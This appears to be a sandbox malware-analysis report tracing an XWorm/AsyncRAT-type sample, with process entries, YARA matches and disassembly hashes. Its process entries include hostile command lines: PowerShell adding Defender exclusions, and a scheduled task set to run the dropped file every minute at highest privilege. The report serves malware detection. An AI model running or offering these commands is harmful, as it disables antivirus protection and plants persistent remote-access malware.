                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe'
                                                                                                              Imagebase:0x7ff760310000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:17
                                                                                                              Start time:16:45:15
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff70f010000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:18
                                                                                                              Start time:16:45:48
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'
                                                                                                              Imagebase:0x7ff760310000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:19
                                                                                                              Start time:16:45:48
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff70f010000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:22
                                                                                                              Start time:16:46:14
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User'
                                                                                                              Imagebase:0x7ff760310000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:23
                                                                                                              Start time:16:46:14
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff70f010000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:24
                                                                                                              Start time:16:46:47
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"
                                                                                                              Imagebase:0x7ff6e8170000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:25
                                                                                                              Start time:16:46:47
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff70f010000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:26
                                                                                                              Start time:16:46:48
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Systen User
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Systen User"
                                                                                                              Imagebase:0xff0000
                                                                                                              File size:43'520 bytes
                                                                                                              MD5 hash:190010C187189B92E49A0ED05F6DDC88
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Systen User, Author: ditekSHen
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Has exited:true

                                                                                                              Target ID:30
                                                                                                              Start time:16:46:59
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\OpenWith.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                              Imagebase:0x7ff6a0cd0000
                                                                                                              File size:123'984 bytes
                                                                                                              MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Target ID:31
                                                                                                              Start time:16:47:00
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                              Imagebase:0x7ff77afe0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Reset < >
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (QC$(QC
                                                                                                                • API String ID: 0-978734326
                                                                                                                • Opcode ID: 59ba83d3fd96051810deaa55c175957d4c65104541454cdfd3128995b60e423a
                                                                                                                • Instruction ID: a7c200ab2590358f32bf473d097c99d9bee4392003191de3711b96b66171e73f
                                                                                                                • Opcode Fuzzy Hash: 59ba83d3fd96051810deaa55c175957d4c65104541454cdfd3128995b60e423a
                                                                                                                • Instruction Fuzzy Hash: C6A16070A699098FEB98DB68D4587ADB7F2FF94350F504269D01AD32E5CF38A846CB40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8[L$r6B
                                                                                                                • API String ID: 0-3374649634
                                                                                                                • Opcode ID: 523df64800aa6ca7684134f2cfbc11b7852df87bbba128dcf52bf1d1516c5bc1
                                                                                                                • Instruction ID: 09be6eb2c4ba79883d0396b2402fa44a37799ae5a14a2dadd4f7a2ccf57423c9
                                                                                                                • Opcode Fuzzy Hash: 523df64800aa6ca7684134f2cfbc11b7852df87bbba128dcf52bf1d1516c5bc1
                                                                                                                • Instruction Fuzzy Hash: B4112B11EAD58A0FF394A67C68A96F9ABF5EF85690B8402B5D01EC319ADE0C7843C241
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8[L$r6B
                                                                                                                • API String ID: 0-3374649634
                                                                                                                • Opcode ID: f6b0a154b72f511876603c1000c5d1531c33e09231eed888785b921911383a5b
                                                                                                                • Instruction ID: fb9400767fdaf807ca08a1501f171eef192f5d42fb04ae271f4df4ff56bb10d8
                                                                                                                • Opcode Fuzzy Hash: f6b0a154b72f511876603c1000c5d1531c33e09231eed888785b921911383a5b
                                                                                                                • Instruction Fuzzy Hash: E7F0D612FA844A0FF2A4B6BD28A92F956E6EB88690B800175D11FC329ADE0C68438201
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8eL
                                                                                                                • API String ID: 0-2915619072
                                                                                                                • Opcode ID: c4a79bd38695ba17e357a5fc8616de3a34b448dc8876c3fb755cba63d128070f
                                                                                                                • Instruction ID: ee65eefd8109dddadbb972a66a703c5a03dd382c344e118fc3a4170f51f4592c
                                                                                                                • Opcode Fuzzy Hash: c4a79bd38695ba17e357a5fc8616de3a34b448dc8876c3fb755cba63d128070f
                                                                                                                • Instruction Fuzzy Hash: E331BA6288E3C21FD34357745C664A57FB0AE5722070E41EBD4D9CB5E3E50C698BC322
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3c45e0150f334b11677be8fc1d3221b5f6c6d6544332929c781db8759054a43f
                                                                                                                • Instruction ID: c2b579dc3a6654a704f93357f307adbf8619f4df273ebef6d85ee672b569c37b
                                                                                                                • Opcode Fuzzy Hash: 3c45e0150f334b11677be8fc1d3221b5f6c6d6544332929c781db8759054a43f
                                                                                                                • Instruction Fuzzy Hash: 61219531F189495FEB84EB6888997BD77E2FF99341B4400BAE40EC3293DE18A8428741
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 66920b503e912e6ac7c8023bfd00626f15bcbb780fe4e2cac51c5d0ee9e9e680
                                                                                                                • Instruction ID: 0282594b3f424fa9485df1760ce9f9566689596b48565cadb367c37797ddb50a
                                                                                                                • Opcode Fuzzy Hash: 66920b503e912e6ac7c8023bfd00626f15bcbb780fe4e2cac51c5d0ee9e9e680
                                                                                                                • Instruction Fuzzy Hash: E8217431F1894D5FEB94FB6888997BD67E2FF98341B44017AE40EC3292DE28A8418741
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 422710c50a05670563e02e7e385cac5cc960be5ca2c9e55eed4f6e1d5fa2e8c6
                                                                                                                • Instruction ID: c851255902e581769950a055a11c58f1a9f2d59e23fe0202af83eb755636e804
                                                                                                                • Opcode Fuzzy Hash: 422710c50a05670563e02e7e385cac5cc960be5ca2c9e55eed4f6e1d5fa2e8c6
                                                                                                                • Instruction Fuzzy Hash: 7301DB30A6D6494FD355A66C94952A973E2FF88644B440579C44AC7296DF2CF8428782
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1aa1478cc14775e73c780a34a15104b3532b9504098b7fc273d741d58cb5b53b
                                                                                                                • Instruction ID: fd9859436782587520a5a2a660f243e273197c961a93ae5211672bd397e7d63b
                                                                                                                • Opcode Fuzzy Hash: 1aa1478cc14775e73c780a34a15104b3532b9504098b7fc273d741d58cb5b53b
                                                                                                                • Instruction Fuzzy Hash: 00F0FF30A6C55A4BD358B66CA4452BE73E2FF8C744B500639D04EC728ACE2CB8428382
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 07a31825f3650e8214d8874c237c289380a4d783b91462b0024d6555b15cb670
                                                                                                                • Instruction ID: 7136a369707687844305e81dc44c7fe7afea6c66dd76f35271f52e0bfb093282
                                                                                                                • Opcode Fuzzy Hash: 07a31825f3650e8214d8874c237c289380a4d783b91462b0024d6555b15cb670
                                                                                                                • Instruction Fuzzy Hash: E2F0DC30A689198BD798BA2C94496BE73E2FF8C740B400539D00FC3399DF2CA8428782
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1327689332.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff887d20000_ozgpPwVAu1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (0_$8,_$H1_$P/_$-_
                                                                                                                • API String ID: 0-1503956390
                                                                                                                • Opcode ID: 2e39ba45922dd0e9ba160a824ce111cc0e7b89fb8b053a76533e70290b0b9ddc
                                                                                                                • Instruction ID: bfa50c2fca007cd53bd6ac97bdeded1d33ca3047f035795b6003c7fdc10f96cb
                                                                                                                • Opcode Fuzzy Hash: 2e39ba45922dd0e9ba160a824ce111cc0e7b89fb8b053a76533e70290b0b9ddc
                                                                                                                • Instruction Fuzzy Hash: D041B762D5E6C24FE3164679281517C6FB0BF536A0B4845FBC0AD870EBEB0CB81AC341

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:23.6%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:15.8%
                                                                                                                Total number of Nodes:19
                                                                                                                Total number of Limit Nodes:0
                                                                                                                execution_graph 4450 7ff887d292bd 4451 7ff887d29320 RtlSetProcessIsCritical 4450->4451 4453 7ff887d293a2 4451->4453 4454 7ff887d2943d 4455 7ff887d2944f 4454->4455 4458 7ff887d28e20 4455->4458 4457 7ff887d2948b 4459 7ff887d28df6 SetWindowsHookExW 4458->4459 4461 7ff887d29b51 4459->4461 4461->4457 4462 7ff887d27681 4463 7ff887d276ce CheckRemoteDebuggerPresent 4462->4463 4465 7ff887d2773f 4463->4465 4470 7ff887d28e40 4471 7ff887d28df6 SetWindowsHookExW 4470->4471 4473 7ff887d29b51 4471->4473 4474 7ff887d28e00 4475 7ff887d28df6 4474->4475 4475->4474 4476 7ff887d29b12 SetWindowsHookExW 4475->4476 4477 7ff887d29b51 4476->4477

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 7ff887d212d9-7ff887d21310 1 7ff887d21b8a-7ff887d21bd1 0->1 2 7ff887d21316-7ff887d2148b call 7ff887d20540 * 10 call 7ff887d20638 0->2 51 7ff887d2148d-7ff887d21494 2->51 52 7ff887d21495-7ff887d2150c call 7ff887d204c0 call 7ff887d204b8 call 7ff887d20358 call 7ff887d20368 2->52 51->52 67 7ff887d2151f-7ff887d2152f 52->67 68 7ff887d2150e-7ff887d21518 52->68 71 7ff887d21531-7ff887d21550 call 7ff887d20358 67->71 72 7ff887d21557-7ff887d21577 67->72 68->67 71->72 78 7ff887d21579-7ff887d21583 call 7ff887d20378 72->78 79 7ff887d21588-7ff887d215b3 72->79 78->79 84 7ff887d215b5-7ff887d215bf 79->84 85 7ff887d215c4-7ff887d215ec call 7ff887d20778 79->85 84->85 91 7ff887d2168c-7ff887d2171a 85->91 92 7ff887d215f2-7ff887d21687 85->92 112 7ff887d21721-7ff887d2185f call 7ff887d20e30 call 7ff887d20dd8 call 7ff887d20388 call 7ff887d20398 91->112 92->112 135 7ff887d218ad-7ff887d218e0 112->135 136 7ff887d21861-7ff887d21894 112->136 147 7ff887d218e2-7ff887d21903 135->147 148 7ff887d21905-7ff887d21935 135->148 136->135 143 7ff887d21896-7ff887d218a3 136->143 143->135 146 7ff887d218a5-7ff887d218ab 143->146 146->135 150 7ff887d2193d-7ff887d21974 147->150 148->150 156 7ff887d21999-7ff887d219c9 150->156 157 7ff887d21976-7ff887d21997 150->157 158 7ff887d219d1-7ff887d21ab3 call 7ff887d203a8 call 7ff887d205d8 call 7ff887d20778 156->158 157->158 177 7ff887d21aba-7ff887d21b6a call 7ff887d204b0 158->177 178 7ff887d21ab5 call 7ff887d20858 158->178 193 7ff887d21b71-7ff887d21b89 177->193 178->177
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6B$6B$6B$6B$"rB$0DL$0DL$0DL$8ML$CAO_^
                                                                                                                • API String ID: 0-295822469
                                                                                                                • Opcode ID: cb3b79cd452a3497cd3c0b3b8b65826e0143a0f10044f48b8bb7776443938371
                                                                                                                • Instruction ID: aa11bdf8e7b0e5d61db3a46dc71a05ce5f0d64d087031b0092a454dff13c0b2f
                                                                                                                • Opcode Fuzzy Hash: cb3b79cd452a3497cd3c0b3b8b65826e0143a0f10044f48b8bb7776443938371
                                                                                                                • Instruction Fuzzy Hash: 72427420F28A494BE794FB7C84597BDB7E2FF98740F5445B9D00EC3296DE2DA8028742

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 671 7ff887d27681-7ff887d2773d CheckRemoteDebuggerPresent 674 7ff887d2773f 671->674 675 7ff887d27745-7ff887d27788 671->675 674->675
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                • String ID:
                                                                                                                • API String ID: 3662101638-0
                                                                                                                • Opcode ID: b0d94ec3de05824ff32a261d1be5ed4337d607589567e2ff3f6e841d63c889b1
                                                                                                                • Instruction ID: bca7d16ad4bb6d1e10ac955ced31cc3ecf1201fbe4b61e18d97abca1ac64f62c
                                                                                                                • Opcode Fuzzy Hash: b0d94ec3de05824ff32a261d1be5ed4337d607589567e2ff3f6e841d63c889b1
                                                                                                                • Instruction Fuzzy Hash: 5931003190865C8FCB58DF98C8467ED7BF0FF65321F0542AAD48AD7292DB34A846CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: r6B
                                                                                                                • API String ID: 0-2624010786
                                                                                                                • Opcode ID: f817390d5beb400f56e2d0fb32fe7801c4d1752ac1fdb828f61f28962b92cd48
                                                                                                                • Instruction ID: 19cf75d6ede13f738325383016d5c86dfe1485afdea7e3d1b97ddff284fb5f40
                                                                                                                • Opcode Fuzzy Hash: f817390d5beb400f56e2d0fb32fe7801c4d1752ac1fdb828f61f28962b92cd48
                                                                                                                • Instruction Fuzzy Hash: 0651FF20A6D6C99FD786AB7858243797FE1EF87255B0805FBE08AC71D7DE0C6846C342
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1672595748dcc29f7b9112a63d5138b12226c90b31664ac3f1a144bdb86d2261
                                                                                                                • Instruction ID: bc198bca2242e90bd7da06d9dba10615c30387d21c635b97045fab79bf714fce
                                                                                                                • Opcode Fuzzy Hash: 1672595748dcc29f7b9112a63d5138b12226c90b31664ac3f1a144bdb86d2261
                                                                                                                • Instruction Fuzzy Hash: 3EF1A530918A4D8FEBA8DF28C855BE977E1FF55351F04426AD84EC7295DB38A841CB82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 808bdce857de70c556a11b0edc867eaf4dde6d46372371d3b165a0072a181713
                                                                                                                • Instruction ID: b5e5d0ae7507fef4b041844cd3d8043709fdb878d8c9e0eee5032c13fa3defc8
                                                                                                                • Opcode Fuzzy Hash: 808bdce857de70c556a11b0edc867eaf4dde6d46372371d3b165a0072a181713
                                                                                                                • Instruction Fuzzy Hash: D1E1C230918A4E8FEBA8EF28C8557E977E1FB55351F04426ED80EC7695CF78A841CB81

                                                                                                                Control-flow Graph

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e59c278e849b7f3da06a90c74a18b8f9fadcf8a9027adcbb37873dbacef0077
                                                                                                                • Instruction ID: 3942d57f7a7c451ed846fadfe5a254b6e73515c568c978d13b914d81b7468191
                                                                                                                • Opcode Fuzzy Hash: 8e59c278e849b7f3da06a90c74a18b8f9fadcf8a9027adcbb37873dbacef0077
                                                                                                                • Instruction Fuzzy Hash: E441263191CA894FD719DB6C98452FDBBE0FF66350F0442BED05EC7192DA287806C782

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 614 7ff887d28e00-7ff887d28e32 618 7ff887d28df6-7ff887d28df9 614->618 619 7ff887d28e34-7ff887d29afd 614->619 618->614 624 7ff887d29b89-7ff887d29b8d 619->624 625 7ff887d29b03-7ff887d29b10 619->625 626 7ff887d29b12-7ff887d29b4f SetWindowsHookExW 624->626 625->626 628 7ff887d29b51 626->628 629 7ff887d29b57-7ff887d29b88 626->629 628->629
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: 148c342025685a9541a041dd404ea11030226181594a3c241784adbf9d989f04
                                                                                                                • Instruction ID: 057517bfad075422cb560cae43ef9cf782a060d52e40317d87cf152aa2a1bcbb
                                                                                                                • Opcode Fuzzy Hash: 148c342025685a9541a041dd404ea11030226181594a3c241784adbf9d989f04
                                                                                                                • Instruction Fuzzy Hash: 6641F731A1CA494FDB58EB68D8456BDBBE0FF65351F14427ED05ED3192CA687802C781

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 632 7ff887d292bd-7ff887d293a0 RtlSetProcessIsCritical 635 7ff887d293a8-7ff887d293dd 632->635 636 7ff887d293a2 632->636 636->635
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2695349919-0
                                                                                                                • Opcode ID: 4736e5c69d7a914d879145ef28c65f97f36187cec986a43322457ba7648d7ecb
                                                                                                                • Instruction ID: 13df4d48e5f54b597af38269505d6b3094cf6a29126aa73096fb5ff85d2563cb
                                                                                                                • Opcode Fuzzy Hash: 4736e5c69d7a914d879145ef28c65f97f36187cec986a43322457ba7648d7ecb
                                                                                                                • Instruction Fuzzy Hash: 2F41033180C6498FC718DFA8D845BE9BBF0FF56311F04416EE09AC3692CB78A846CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 638 7ff887d29a78-7ff887d29a7f 639 7ff887d29a8a-7ff887d29afd 638->639 640 7ff887d29a81-7ff887d29a89 638->640 644 7ff887d29b89-7ff887d29b8d 639->644 645 7ff887d29b03-7ff887d29b10 639->645 640->639 646 7ff887d29b12-7ff887d29b4f SetWindowsHookExW 644->646 645->646 648 7ff887d29b51 646->648 649 7ff887d29b57-7ff887d29b88 646->649 648->649
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: c581811641039e020e5e735742808af5e513c56791bfcd2a855c58f7d1800576
